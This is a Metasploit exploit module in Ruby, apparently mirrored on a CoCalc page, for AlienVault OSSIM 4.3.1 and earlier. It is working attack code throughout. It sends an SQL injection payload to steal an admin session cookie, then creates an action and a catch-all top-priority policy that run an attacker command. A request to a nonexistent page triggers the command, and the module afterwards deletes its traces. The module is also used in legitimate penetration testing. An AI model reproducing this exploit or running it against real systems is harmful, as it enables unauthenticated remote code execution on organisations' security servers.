CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/http/alienvault_sqli_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info={})11super(update_info(info,12'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution",13'Description' => %q{14This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault15OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an16active admin session ID. If an administrator level user is identified, remote code execution17can be gained by creating a high priority policy with an action containing our payload.18},19'License' => MSF_LICENSE,20'Author' =>21[22'Sasha Zivojinovic', # SQLi discovery23'xistence <xistence[at]0x90.nl>' # Metasploit module24],25'References' =>26[27['CVE', '2016-8581'],28['OSVDB', '106252'],29['EDB', '33006']30],31'DefaultOptions' =>32{33'SSL' => true,34'WfsDelay' => 1035},36'Platform' => 'unix',37'Arch' => ARCH_CMD,38'Payload' =>39{40'Compat' =>41{42'RequiredCmd' => 'generic perl python',43}44},45'Targets' =>46[47['Alienvault OSSIM 4.3', {}]48],49'Privileged' => true,50'DisclosureDate' => '2014-04-24',51'DefaultTarget' => 0))5253register_options(54[55Opt::RPORT(443),56OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])57])58end596061def check62marker = rand_text_alpha(6)63sqli_rand = rand_text_numeric(4+rand(4))64sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "65sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"6667res = send_request_cgi({68'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),69'vars_get' => { 'date_from' => sqli }70})7172if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root73return Exploit::CheckCode::Vulnerable74else75print_status("#{res.body}")76return Exploit::CheckCode::Safe77end7879end808182def exploit83marker = rand_text_alpha(6)84sqli_rand = rand_text_numeric(4+rand(4))85sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "86sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"8788print_status("Trying to grab admin session through SQLi")8990res = send_request_cgi({91'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),92'vars_get' => { 'date_from' => sqli }93})9495if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/96admin_session = $197@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")98print_status("Admin session cookie is [ #{@cookie} ]")99else100fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")101end102103# Creating an Action containing our payload, which will be executed by any event (not only alarms)104action = rand_text_alpha(8+(rand(8)))105res = send_request_cgi({106'method' => 'POST',107'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),108'cookie' => @cookie,109'vars_post' => {110'action' => 'new',111'action_name' => action,112'descr' => action,113'action_type' => '2',114'only' => 'on',115'cond' => 'True',116'exec_command' => payload.encoded117}118})119120if res && res.code == 200121print_status("Created Action [ #{action} ]")122else123fail_with(Failure::Unknown, "#{peer} - Action creation failed!")124end125126# Retrieving the Action ID, used to clean up the action after successful exploitation127res = send_request_cgi({128'method' => 'POST',129'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),130'cookie' => @cookie,131'vars_post' => {132'page' => '1',133'rp' => '2000'134}135})136137if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/138@action_id = $1139print_status("Action ID is [ #{@action_id} ]")140else141fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")142end143144# Retrieving the policy data, necessary for proper cleanup after succesful exploitation145res = send_request_cgi({146'method' => 'GET',147'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),148'cookie' => @cookie,149'vars_get' => {150'm_opt' => 'configuration',151'sm_opt' => 'threat_intelligence',152'h_opt' => 'policy'153}154})155156if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/157policy_ctx = $1158policy_group = $2159print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")160else161fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")162end163164# Creating policy which will be triggered by any source/destination165policy = rand_text_alpha(8+(rand(8)))166res = send_request_cgi({167'method' => 'POST',168'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),169'cookie' => @cookie,170'vars_post' => {171'descr' => policy,172'active' => '1',173'group' => policy_group,174'ctx' => policy_ctx,175'order' => '1', # Makes this the first policy, overruling all the other policies176'action' => 'new',177'sources[]' => '00000000000000000000000000000000', # Source is ANY178'dests[]' => '00000000000000000000000000000000', # Destination is ANY179'portsrc[]' => '0', # Any source port180'portdst[]' => '0', # Any destination port181'plug_type' => '1', # Taxonomy182'plugins[0]' => 'on',183'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found184'tax_pt' => '0',185'tax_cat' => '0',186'tax_subc' => '0',187'mboxs[]' => '00000000000000000000000000000000',188'rep_act' => '0',189'rep_sev' => '1',190'rep_rel' => '1',191'rep_dir' => '0',192'ev_sev' => '1',193'ev_rel' => '1',194'tzone' => 'Europe/Amsterdam',195'date_type' => '1',196'begin_hour' => '0',197'begin_minute' => '0',198'begin_day_week' => '1',199'begin_day_month' => '1',200'begin_month' => '1',201'end_hour' => '23',202'end_minute' => '59',203'end_day_week' => '7',204'end_day_month' => '31',205'end_month' => '12',206'actions[]' => @action_id,207'sim' => '1',208'priority' => '1',209'qualify' => '1',210'correlate' => '0', # Don't make any correlations211'cross_correlate' => '0', # Don't make any correlations212'store' => '0' # We don't want to store anything :)213}214})215216if res && res.code == 200217print_status("Created Policy [ #{policy} ]")218else219fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")220end221222# Retrieve policy ID, needed for proper cleanup after succesful exploitation223res = send_request_cgi({224'method' => 'POST',225'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),226'cookie' => @cookie,227'vars_get' => {228'ctx' => policy_ctx,229'group' => policy_group230},231'vars_post' => {232'page' => '1',233'rp' => '2000'234}235})236if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/237@policy_id = $1238print_status("Policy ID [ #{@policy_id} ] retrieved!")239else240fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")241end242243# Reload the policies to make our new policy active244print_status("Reloading Policies")245res = send_request_cgi({246'method' => 'GET',247'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),248'cookie' => @cookie,249'vars_get' => {250'what' => 'policies',251'back' => '../policy/policy.php'252}253})254255if res && res.code == 200256print_status("Policies reloaded!")257else258fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")259end260261# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.262dont_exist = rand_text_alpha(8+rand(4))263print_status("Triggering policy and action by requesting a non existing url")264res = send_request_cgi({265'method' => 'GET',266'uri' => normalize_uri(target_uri.path, dont_exist),267'cookie' => @cookie268})269270if res and res.code == 404271print_status("Payload delivered")272else273fail_with(Failure::Unknown, "#{peer} - Payload failed!")274end275276end277278279def cleanup280begin281# Clean up, retrieve token so that the policy can be removed282print_status("Cleaning up")283res = send_request_cgi({284'method' => 'POST',285'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),286'cookie' => @cookie,287'vars_post' => { 'f_name' => 'delete_policy' }288})289290if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/291token = $1292print_status("Token [ #{token} ] retrieved")293else294print_warning("Unable to retrieve token")295end296297# Remove our policy298res = send_request_cgi({299'method' => 'GET',300'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),301'cookie' => @cookie,302'vars_get' => {303'confirm' => 'yes',304'id' => @policy_id,305'token' => token306}307})308309if res && res.code == 200310print_status("Policy ID [ #{@policy_id} ] removed")311else312print_warning("Unable to remove Policy ID")313end314315# Remove our action316res = send_request_cgi({317'method' => 'GET',318'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),319'cookie' => @cookie,320'vars_get' => {321'id' => @action_id,322}323})324325if res && res.code == 200326print_status("Action ID [ #{@action_id} ] removed")327else328print_warning("Unable to remove Action ID")329end330331# Reload the policies to revert back to the state before exploitation332print_status("Reloading Policies")333res = send_request_cgi({334'method' => 'GET',335'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),336'cookie' => @cookie,337'vars_get' => {338'what' => 'policies',339'back' => '../policy/policy.php'340}341})342343if res && res.code == 200344print_status("Policies reloaded!")345else346fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")347end348349ensure350super # mixins should be able to cleanup even in case of Exception351end352end353end354355356